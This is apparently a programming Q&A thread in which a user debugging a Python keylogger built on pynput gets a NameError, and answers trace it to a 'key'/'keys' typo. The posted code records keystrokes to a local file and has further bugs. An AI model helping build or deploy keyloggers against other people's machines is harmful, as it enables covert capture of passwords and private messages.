# Python NameError: name 'keys' is not defined error pynput

Tags: python, pynput

I've been trying to make a keylogger but got this error in python while running the script.

> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput_util_*init*_.py", line 211, in inner
> return f(self, *args, **kwargs)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput\keyboard_win32.py", line 280, in *process
> self.on_press(key)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput_util_*init**.py", line 127, in inner
> if f(*args) is False:
> File "C:\Users\David\Desktop\TESTING\keylogger\main.py", line 16, in on_press
> keys.append(str(key))
> NameError: name 'keys' is not defined
> Traceback (most recent call last):
> File "C:\Users\David\Desktop\TESTING\keylogger\main.py", line 43, in 
> listener.join()
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput_util_*init*_.py", line 259, in join
> six.reraise(exc_type, exc_value, exc_traceback)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\six.py", line 702, in reraise
> raise value.with_traceback(tb)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput_util_*init*_.py", line 211, in inner
> return f(self, *args, **kwargs)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput\keyboard_win32.py", line 280, in *process
> self.on_press(key)
> File "C:\Users\David\AppData\Roaming\Python\Python39\site-packages\pynput_util_*init**.py", line 127, in inner
> if f(*args) is False:
> File "C:\Users\David\Desktop\TESTING\keylogger\main.py", line 16, in on_press
> keys.append(str(key))
> NameError: name 'keys' is not defined
> [Finished in 0.614s]

I dont know how to fix this, I already installed pyinput with pip install pyinput and still doesn't work :/

---

Code:

```
    import pynput
from pynput.keyboard import Key, Listener


count = 0
key = []



def on_press(key):

    global keys, count

    keys.append(str(key))


    print("{0} pressed".format(key))

    if count >= 10:
        count = 0
        write_file(keys)
        keys = ()


def write_file(keys):
    with open("log.txt", "w" & "a") as f:
        for key in keys:
            k = str(key).replace("'","")
            f.write(str(key))



def on_release(key):
    if key == Key.esc:
        return False


with Listener(on_press=on_press,on_release=on_release) as listener:
    listener.join()
```

---

Any help is appriciated, thanks.

Comment: Because there is no `keys` defined. Did you mean `keys = []`?

Comment: replace `key = []` with `keys = []` (line 6)

Answer (score 0, accepted):

You have made a typo in line 6 and thus `keys` is not declared anywhere as the error message is telling you (e.g. `NameError: name 'keys' is not defined`).

Line 6 should instead be `keys = []` of `key = []`.

Answer (score 1):

Because keys is literally not defined anywhere

**I think you made a spelling mistake.**

You need to replace `key = []` with `keys = []`

Answer (score 0):

I think you have a typo during initialization of the `keys` list. You have declared it as `key` but you need `keys`.

You need:

```
keys = []
```

instead of:

```
key = []
```